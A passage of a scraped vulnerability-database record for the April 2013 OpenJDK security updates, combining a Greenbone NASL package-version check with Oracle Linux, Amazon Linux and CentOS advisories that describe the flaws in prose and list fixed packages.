(CVE-2013-2429, CVE-2013-2430)\n\n The JDBC driver manager could incorrectly call the toString() method in\n JDBC drivers, and the ConcurrentHashMap class could incorrectly call the\n defaultReadObject() method. An untrusted Java application or applet could\n possibly use these flaws to bypass Java sandbox restrictions.\n (CVE-2013-1488, CVE-2013-2426)\n\n The sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\n invoke the system class loader. An untrusted Java application or applet\n could possibly use this flaw to bypass certain Java sandbox restrict ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881719\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-25 10:21:12 +0530 (Thu, 25 Apr 2013)\");\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\",\n \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\",\n \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\",\n \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\",\n \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"CentOS Update for java CESA-2013:0770 centos6\");\n\n script_xref(name:\"CESA\", value:\"2013:0770\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-April/019703.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:30", "bulletinFamily": "unix", "description": "[1:1.6.0.0-1.61.1.11.11]\n- added and applied (temporally) patch10 fixToFontSecurityFix.patch.\n - fixing regression in fonts introduced by one security patch.\n- Resolves: rhbz#950386\n[1:1.6.0.0-1.60.1.11.11]\n- added and applied (temporally) one more patch to xalan/xerces privileges\n - patch9 jaxp-backport-factoryfinder.patch\n- will be upstreamed\n- Resolves: rhbz#950386\n[1:1.6.0.0-1.59.1.11.11]\n- Updated to icedtea6 1.11.11 - fixed xalan/xerxes privledges\n- removed patch 8 - removingOfAarch64.patch.patch - fixed upstream\n- Resolves: rhbz#950386\n[1:1.6.0.0-1.58.1.11.10]\n- Updated to icedtea6 1.11.10\n- rewritten java-1.6.0-openjdk-java-access-bridge-security.patch\n- excluded aarch64.patch\n - by patch 8 - removingOfAarch64.patch.patch\n- Resolves: rhbz#950386", "modified": "2013-04-24T00:00:00", "published": "2013-04-24T00:00:00", "id": "ELSA-2013-0770", "href": "http://linux.oracle.com/errata/ELSA-2013-0770.html", "title": "java-1.6.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:45", "bulletinFamily": "unix", "description": "[1.7.0.19-2.3.9.1.0.1.el5_9]\r\n- Add oracle-enterprise.patch\r\n- Fix DISTRO_NAME to \"Enterprise Linux\"\r\n \n[1.7.0.19-2.3.9.1.el5]\r\n- updated to updated IcedTea 2.3.9 with fix to one of security fixes\r\n- fixed font glyph offset\r\n- Resolves: rhbz#950376\r\n \n[1.7.0.19-2.3.9.0.el5]\r\n- updated to IcedTea 2.3.9 with latest security patches\r\n- buildver sync to b19\r\n- rewritten java-1.7.0-openjdk-java-access-bridge-security.patch\r\n- Resolves: rhbz#950376\r\n \n[1.7.0.9-2.3.8.1.el5]\r\n- Added some of the latest Fedora spec bugfixes\r\n- Bumped release\r\n- zlib in BuildReq restricted for 1.2.3-7 or higher\r\n- see https://bugzilla.redhat.com/show_bug.cgi?id=904231\r\n- Removed a -icedtea tag from the version\r\n- package have less and less connections to icedtea7\r\n- Added gcc-c++ build dependence. Sometimes caused troubles during rpm -bb\r\n- Added (Build)Requires for fontconfig and xorg-x11-fonts-Type1\r\n- see https://bugzilla.redhat.com/show_bug.cgi?id=721033 for details\r\n- logging.properties marked as config(noreplace)\r\n- see https://bugzilla.redhat.com/show_bug.cgi?id=679180 for details\r\n- nss.cfg was marked as config(noreplace)\r\n- slaves sync with el6\r\n- Resolves: rhbz#950376\r", "modified": "2013-04-17T00:00:00", "published": "2013-04-17T00:00:00", "id": "ELSA-2013-0752", "href": "http://linux.oracle.com/errata/ELSA-2013-0752.html", "title": "java-1.7.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:48", "bulletinFamily": "unix", "description": "[1.7.0.19-2.3.9.1.0.1.el6_4]\n- Update DISTRO_NAME in specfile\n[1.7.0.19-2.3.9.1.el6]\n- updated to updated IcedTea 2.3.9 with fix to one of security fixes\n - fixed font glyph offset\n- Resolves: rhbz#950380\n[1.7.0.9-2.3.9.0.el6]\n- updated to IcedTea 2.3.9 with latest security patches\n- buildver sync to b19\n- rewritten java-1.7.0-openjdk-java-access-bridge-security.patch\n- Resolves: rhbz#950380\n[1.7.0.19-2.3.8.2.el6]\n- Added latest Fedora spec changes\n- Bumped release\n- Removed patch2 java-1.7.0-openjdk-java-access-bridge-idlj.patch (unapplied)\n- zlib in BuildReq restricted for 1.2.3-7 or higher\n - see https://bugzilla.redhat.com/show_bug.cgi?id=904231\n- Removed a -icedtea tag from the version\n - package have less and less connections to icedtea7\n- Added gcc-c++ build dependence. Sometimes caused troubles during rpm -bb\n- Added (Build)Requires for fontconfig and xorg-x11-fonts-Type1\n - see https://bugzilla.redhat.com/show_bug.cgi?id=721033 for details\n- Removed all fonconfig files. Fonts are now handled differently in JDK\n and those files are redundant. This is going to be usptreamed.\n - see https://bugzilla.redhat.com/show_bug.cgi?id=902227 for details\n- logging.properties marked as config(noreplace)\n - see https://bugzilla.redhat.com/show_bug.cgi?id=679180 for details\n- classes.jsa marked as ghost on full path\n - see https://bugzilla.redhat.com/show_bug.cgi?id=918172 for details\n- nss.cfg was marked as config(noreplace)\n- Add symlink to default soundfont (see 541466)\n- Resolves: rhbz#950380\n[1.7.0.9-2.3.8.1.el6]\n- Added and applied patch 116 - patch 116 rh905128-non_block_ciphers.patch\n- Added and applied patch 117 - patch 117 java-1.7.0-openjdk-nss-multiplePKCS11libraryInitialisationNnonCritical.patch\n - to enable handleStartupErrors = ignoreMultipleInitialisation in icedtea 2.3\n- Restorered removed nss support\n- Fixed java-1.7.0-openjdk-nss-config-{1,2} patches to be valid for icedtea 2.3.x\n- enable_nss switch to 0 - disabled\n- Resolves: rhbz#950380", "modified": "2013-04-17T00:00:00", "published": "2013-04-17T00:00:00", "id": "ELSA-2013-0751", "href": "http://linux.oracle.com/errata/ELSA-2013-0751.html", "title": "java-1.7.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2019-05-29T17:22:39", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nMultiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. ([CVE-2013-1569 __](<https://access.redhat.com/security/cve/CVE-2013-1569>), [CVE-2013-2383 __](<https://access.redhat.com/security/cve/CVE-2013-2383>), [CVE-2013-2384 __](<https://access.redhat.com/security/cve/CVE-2013-2384>))\n\nMultiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-1558 __](<https://access.redhat.com/security/cve/CVE-2013-1558>), [CVE-2013-2422 __](<https://access.redhat.com/security/cve/CVE-2013-2422>), [CVE-2013-1518 __](<https://access.redhat.com/security/cve/CVE-2013-1518>), [CVE-2013-1557 __](<https://access.redhat.com/security/cve/CVE-2013-1557>))\n\nThe previous default value of the java.rmi.server.useCodebaseOnly property permitted the RMI implementation to automatically load classes from remotely specified locations. An attacker able to connect to an application using RMI could use this flaw to make the application execute arbitrary code. ([CVE-2013-1537 __](<https://access.redhat.com/security/cve/CVE-2013-1537>))\n\nThe 2D component did not properly process certain images. An untrusted Java application or applet could possibly use this flaw to trigger Java Virtual Machine memory corruption. ([CVE-2013-2420 __](<https://access.redhat.com/security/cve/CVE-2013-2420>))\n\nIt was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-2431 __](<https://access.redhat.com/security/cve/CVE-2013-2431>), [CVE-2013-2421 __](<https://access.redhat.com/security/cve/CVE-2013-2421>))\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. ([CVE-2013-2429 __](<https://access.redhat.com/security/cve/CVE-2013-2429>), [CVE-2013-2430 __](<https://access.redhat.com/security/cve/CVE-2013-2430>))\n\nThe JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions. ([CVE-2013-1488 __](<https://access.redhat.com/security/cve/CVE-2013-1488>), [CVE-2013-2426 __](<https://access.redhat.com/security/cve/CVE-2013-2426>))\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions. ([CVE-2013-0401 __](<https://access.redhat.com/security/cve/CVE-2013-0401>))\n\nFlaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine. ([CVE-2013-2417 __](<https://access.redhat.com/security/cve/CVE-2013-2417>), [CVE-2013-2419 __](<https://access.redhat.com/security/cve/CVE-2013-2419>))\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX component did not properly check class access before creating new instances. An untrusted Java application or applet could use this flaw to create instances of non-public classes. ([CVE-2013-2424 __](<https://access.redhat.com/security/cve/CVE-2013-2424>))\n\nIt was discovered that JAX-WS could possibly create temporary files with insecure permissions. A local attacker could use this flaw to access temporary files created by an application using JAX-WS. ([CVE-2013-2415 __](<https://access.redhat.com/security/cve/CVE-2013-2415>))\n\n \n**Affected Packages:** \n\n\njava-1.6.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.6.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.6.0-openjdk-debuginfo-1.6.0.0-61.1.11.11.53.amzn1.i686 \n java-1.6.0-openjdk-javadoc-1.6.0.0-61.1.11.11.53.amzn1.i686 \n java-1.6.0-openjdk-devel-1.6.0.0-61.1.11.11.53.amzn1.i686 \n java-1.6.0-openjdk-demo-1.6.0.0-61.1.11.11.53.amzn1.i686 \n java-1.6.0-openjdk-src-1.6.0.0-61.1.11.11.53.amzn1.i686 \n java-1.6.0-openjdk-1.6.0.0-61.1.11.11.53.amzn1.i686 \n \n src: \n java-1.6.0-openjdk-1.6.0.0-61.1.11.11.53.amzn1.src \n \n x86_64: \n java-1.6.0-openjdk-src-1.6.0.0-61.1.11.11.53.amzn1.x86_64 \n java-1.6.0-openjdk-demo-1.6.0.0-61.1.11.11.53.amzn1.x86_64 \n java-1.6.0-openjdk-javadoc-1.6.0.0-61.1.11.11.53.amzn1.x86_64 \n java-1.6.0-openjdk-1.6.0.0-61.1.11.11.53.amzn1.x86_64 \n java-1.6.0-openjdk-devel-1.6.0.0-61.1.11.11.53.amzn1.x86_64 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-61.1.11.11.53.amzn1.x86_64 \n \n \n", "modified": "2014-09-15T22:53:00", "published": "2014-09-15T22:53:00", "id": "ALAS-2013-185", "href": "https://alas.aws.amazon.com/ALAS-2013-185.html", "title": "Important: java-1.6.0-openjdk", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:22:29", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nMultiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. ([CVE-2013-1569 __](<https://access.redhat.com/security/cve/CVE-2013-1569>), [CVE-2013-2383 __](<https://access.redhat.com/security/cve/CVE-2013-2383>), [CVE-2013-2384 __](<https://access.redhat.com/security/cve/CVE-2013-2384>))\n\nMultiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-1558 __](<https://access.redhat.com/security/cve/CVE-2013-1558>), [CVE-2013-2422 __](<https://access.redhat.com/security/cve/CVE-2013-2422>), [CVE-2013-2436 __](<https://access.redhat.com/security/cve/CVE-2013-2436>), [CVE-2013-1518 __](<https://access.redhat.com/security/cve/CVE-2013-1518>), [CVE-2013-1557 __](<https://access.redhat.com/security/cve/CVE-2013-1557>))\n\nThe previous default value of the java.rmi.server.useCodebaseOnly property permitted the RMI implementation to automatically load classes from remotely specified locations. An attacker able to connect to an application using RMI could use this flaw to make the application execute arbitrary code. ([CVE-2013-1537 __](<https://access.redhat.com/security/cve/CVE-2013-1537>))\n\nThe 2D component did not properly process certain images. An untrusted Java application or applet could possibly use this flaw to trigger Java Virtual Machine memory corruption. ([CVE-2013-2420 __](<https://access.redhat.com/security/cve/CVE-2013-2420>))\n\nIt was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform access checks and MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-2431 __](<https://access.redhat.com/security/cve/CVE-2013-2431>), [CVE-2013-2421 __](<https://access.redhat.com/security/cve/CVE-2013-2421>), [CVE-2013-2423 __](<https://access.redhat.com/security/cve/CVE-2013-2423>))\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. ([CVE-2013-2429 __](<https://access.redhat.com/security/cve/CVE-2013-2429>), [CVE-2013-2430 __](<https://access.redhat.com/security/cve/CVE-2013-2430>))\n\nThe JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions. ([CVE-2013-1488 __](<https://access.redhat.com/security/cve/CVE-2013-1488>), [CVE-2013-2426 __](<https://access.redhat.com/security/cve/CVE-2013-2426>))\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions. ([CVE-2013-0401 __](<https://access.redhat.com/security/cve/CVE-2013-0401>))\n\nFlaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine. ([CVE-2013-2417 __](<https://access.redhat.com/security/cve/CVE-2013-2417>), [CVE-2013-2419 __](<https://access.redhat.com/security/cve/CVE-2013-2419>))\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX component did not properly check class access before creating new instances. An untrusted Java application or applet could use this flaw to create instances of non-public classes. ([CVE-2013-2424 __](<https://access.redhat.com/security/cve/CVE-2013-2424>))\n\nIt was discovered that JAX-WS could possibly create temporary files with insecure permissions. A local attacker could use this flaw to access temporary files created by an application using JAX-WS. ([CVE-2013-2415 __](<https://access.redhat.com/security/cve/CVE-2013-2415>))\n\n \n**Affected Packages:** \n\n\njava-1.7.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.7.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.7.0-openjdk-demo-1.7.0.19-2.3.9.1.25.amzn1.i686 \n java-1.7.0-openjdk-src-1.7.0.19-2.3.9.1.25.amzn1.i686 \n java-1.7.0-openjdk-1.7.0.19-2.3.9.1.25.amzn1.i686 \n java-1.7.0-openjdk-debuginfo-1.7.0.19-2.3.9.1.25.amzn1.i686 \n java-1.7.0-openjdk-devel-1.7.0.19-2.3.9.1.25.amzn1.i686 \n \n noarch: \n java-1.7.0-openjdk-javadoc-1.7.0.19-2.3.9.1.25.amzn1.noarch \n \n src: \n java-1.7.0-openjdk-1.7.0.19-2.3.9.1.25.amzn1.src \n \n x86_64: \n java-1.7.0-openjdk-debuginfo-1.7.0.19-2.3.9.1.25.amzn1.x86_64 \n java-1.7.0-openjdk-devel-1.7.0.19-2.3.9.1.25.amzn1.x86_64 \n java-1.7.0-openjdk-demo-1.7.0.19-2.3.9.1.25.amzn1.x86_64 \n java-1.7.0-openjdk-1.7.0.19-2.3.9.1.25.amzn1.x86_64 \n java-1.7.0-openjdk-src-1.7.0.19-2.3.9.1.25.amzn1.x86_64 \n \n \n", "modified": "2014-09-15T22:52:00", "published": "2014-09-15T22:52:00", "id": "ALAS-2013-183", "href": "https://alas.aws.amazon.com/ALAS-2013-183.html", "title": "Critical: java-1.7.0-openjdk", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:0770\n\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use these\nflaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\nCVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the Beans,\nLibraries, JAXP, and RMI components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518, CVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly property\npermitted the RMI implementation to automatically load classes from\nremotely specified locations. An attacker able to connect to an application\nusing RMI could use this flaw to make the application execute arbitrary\ncode. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the property\nto true, restricting class loading to the local CLASSPATH and locations\nspecified in the java.rmi.server.codebase property. Refer to Red Hat\nBugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted Java\napplication or applet could possibly use this flaw to trigger Java Virtual\nMachine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws to\nbypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\ncomponent did not protect against modification of their state while\nperforming certain native code operations. An untrusted Java application or\napplet could possibly use these flaws to trigger Java Virtual Machine\nmemory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method in\nJDBC drivers, and the ConcurrentHashMap class could incorrectly call the\ndefaultReadObject() method. An untrusted Java application or applet could\npossibly use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\ninvoke the system class loader. An untrusted Java application or applet\ncould possibly use this flaw to bypass certain Java sandbox restrictions.\n(CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress serialization,\nand the 2D component's font handling. An untrusted Java application or\napplet could possibly use these flaws to crash the Java Virtual Machine.\n(CVE-2013-2417, CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX component did\nnot properly check class access before creating new instances. An untrusted\nJava application or applet could use this flaw to create instances of\nnon-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files with\ninsecure permissions. A local attacker could use this flaw to access\ntemporary files created by an application using JAX-WS. (CVE-2013-2415)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.10. Refer\nto the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-April/019703.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-April/019705.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2013-0770.html", "modified": "2013-04-24T21:40:25", "published": "2013-04-24T20:56:24", "href": "http://lists.centos.org/pipermail/centos-announce/2013-April/019705.html", "id": "CESA-2013:0770", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:0751\n\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use these\nflaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\nCVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the Beans,\nLibraries, JAXP, and RMI components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-2436, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly property\npermitted the RMI implementation to automatically load classes from\nremotely specified locations. An attacker able to connect to an application\nusing RMI could use this flaw to make the application execute arbitrary\ncode. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the property\nto true, restricting class loading to the local CLASSPATH and locations\nspecified in the java.rmi.server.codebase property. Refer to Red Hat\nBugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted Java\napplication or applet could possibly use this flaw to trigger Java Virtual\nMachine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform access checks and\nMethodHandle lookups. An untrusted Java application or applet could\nuse these flaws to bypass Java sandbox restrictions. (CVE-2013-2431,\nCVE-2013-2421, CVE-2013-2423)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\ncomponent did not protect against modification of their state while\nperforming certain native code operations. An untrusted Java application or\napplet could possibly use these flaws to trigger Java Virtual Machine\nmemory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method in\nJDBC drivers, and the ConcurrentHashMap class could incorrectly call the\ndefaultReadObject() method. An untrusted Java application or applet could\npossibly use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\ninvoke the system class loader. An untrusted Java application or applet\ncould possibly use this flaw to bypass certain Java sandbox restrictions.\n(CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress serialization,\nand the 2D component's font handling. An untrusted Java application or\napplet could possibly use these flaws to crash the Java Virtual Machine.\n(CVE-2013-2417, CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX component did\nnot properly check class access before creating new instances. An untrusted\nJava application or applet could use this flaw to create instances of\nnon-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files with\ninsecure permissions. A local attacker could use this flaw to access\ntemporary files created by an application using JAX-WS. (CVE-2013-2415)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.9. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-April/019695.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0751.html", "modified": "2013-04-17T22:33:59", "published": "2013-04-17T22:33:59", "href": "http://lists.centos.org/pipermail/centos-announce/2013-April/019695.html", "id": "CESA-2013:0751", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:49", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:0752\n\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use these\nflaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\nCVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the Beans,\nLibraries, JAXP, and RMI components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-2436, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly property\npermitted the RMI implementation to automatically load classes from\nremotely specified locations. An attacker able to connect to an application\nusing RMI could use this flaw to make the application execute arbitrary\ncode. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the property\nto true, restricting class loading to the local CLASSPATH and locations\nspecified in the java.rmi.server.codebase property. Refer to Red Hat\nBugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted Java\napplication or applet could possibly use this flaw to trigger Java Virtual\nMachine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform access checks and\nMethodHandle lookups. An untrusted Java application or applet could\nuse these flaws to bypass Java sandbox restrictions. (CVE-2013-2431,\nCVE-2013-2421, CVE-2013-2423)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\ncomponent did not protect against modification of their state while\nperforming certain native code operations. An untrusted Java application or\napplet could possibly use these flaws to trigger Java Virtual Machine\nmemory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method in\nJDBC drivers, and the ConcurrentHashMap class could incorrectly call the\ndefaultReadObject() method. An untrusted Java application or applet could\npossibly use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\ninvoke the system class loader. An untrusted Java application or applet\ncould possibly use this flaw to bypass certain Java sandbox restrictions.\n(CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress serialization,\nand the 2D component's font handling. An untrusted Java application or\napplet could possibly use these flaws to crash the Java Virtual Machine.\n(CVE-2013-2417, 